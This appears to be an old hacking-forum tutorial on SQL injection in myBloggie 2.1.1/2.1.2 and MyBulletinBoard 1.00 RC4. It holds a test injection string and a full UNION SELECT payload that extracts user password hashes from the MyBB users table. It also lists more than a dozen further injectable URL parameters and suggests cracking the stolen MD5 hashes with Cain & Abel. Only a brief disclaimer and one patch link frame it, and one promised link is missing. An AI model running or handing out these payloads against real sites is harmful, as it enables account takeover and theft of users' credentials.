Exploits (done?)
MyBloggie SQL exploit:
Vulnerable Systems:
-
myBloggie version 2.1.1
-
myBloggie version 2.1.2
This is a php based webblog system, the new thing "you just gotta have".
A blog is something where people put their - ow so interesting - life in and in the case when they can't code their own stuff they use cms's like this.
So in this particular open source software there is an sql injection exploit wich can be used to get admin hashes.
You can check if you can inject sql injection by going to the site, f.e.
www.example.com/mybloggie/index.php and then inputting mode=search&keyword=test'UNION SELECT * FROM test
if you get a nice sql error saying that your syntax isn't like it is supposed to be then you know you can exploit it.
To get the admin hashes use this link;
this will post all admin hashes and the nicknames. Yippie
Now that you have the hashes you can start cracking it, cain& abel is a good program for cracking md5 hashes, also the most know for it.
this can be found at: http://www.oxid.it/cain.html
So how did it work:
Well basically when you do the month_no=1&year=1&mode=viewdate&date_no=1 it goes to the sql database and get's the info stored in the variables month_no and year out of the db.
This is done thrue sql commands, now due to bad checking of the inputted text you are able to input sql commands to ask the database what you want and hey, everyone knows when you ask something nicely you always get what you want :p
/$\ source: securityfocus /$\
My BulletinBoard sql injection exploit:
Vurnable Systems: *MyBulletinBoard 1.00 Release Candidate 4
Well a second exploit works on the same principe as the one above. Basically because of a lack of user input checking in some variables a user is granted to ask the db nifty sql questions :)
So if we would bring it into real life this would be it; www.example.com/myBB/ {it could be named anything instead of the myBB folder, but that's the default from installation} Then the first thing we can do is go to the calendar.php page and there's where we ask the db for the password hash by doing this:
www.example.com/myBB/calendar.php?action=event&eid='%20UNION%20SELECT%20uid,uid,null,null,null,null,password,null%20FROM%20mybb_users%20WHERE uid=(the id you want)/*
If the board is vurnable we get a nice output with the user hash of the uid inputted. To know wich userid you want, check the member pages and click on the profiles => in the url you will see the userid.
if the exploit didn't work it could be because of the settings of the sql database so luckely for us there are still alot of variables exploitable :)
http://www.example.com/mybb/online.php?pidsql=)[sql_query] http://www.example.com/mybb/memberlist.php?usersearch=%'[sql_query] http://www.example.com/mybb/editpost.php?pid='[sql_query] http://www.example.com/mybb/forumdisplay.php?fid='[sql_query] http://www.example.com/mybb/newreply.php?tid='[sql_query]
http://www.example.com/mybb/search.php?action=results&sid='[sql_query] http://www.example.com/mybb/showthread.php?tid='[sql_query] http://www.example.com/mybb/showthread.php?pid='[sql_query] http://www.example.com/mybb/usercp2.php?tid='[sql_query] http://www.example.com/mybb/printthread.php?tid='[sql_query] http://www.example.com/mybb/reputation.php?pid='[sql_query]
http://www.example.com/mybb/portal.php?action=do_login&username='[sql_query]
http://www.example.com/mybb/polls.php?action=newpoll&tid='[sql_query] http://www.example.com/mybb/ratethread.php?tid='[sql_query]
/$\source: http://www.securityalertz.com/Article907.html /$\
how to solve this :> http://www.mybboard.com/community/showthread.php?tid=2559 //security patch
Disclaimer:
Make sure you only use this for educational purpose, everything illegal you do with it is your thing and HBH nor me takes responsibility for it. Don't get all stupid with this, because 5 minutes of fame isn't really rewarding enough for the "shower fun hour" your future cell mates could play with you for the next 3 months. :)
Don't sit still, do the thing you love the most, but do it with style and honour :D
Any comments, fanmail, hatemail, suggestions, help, you know how to find me.
[$]Anarcho-Hippie[$]
that's what i have, do with it what you want :) suggestions always welcome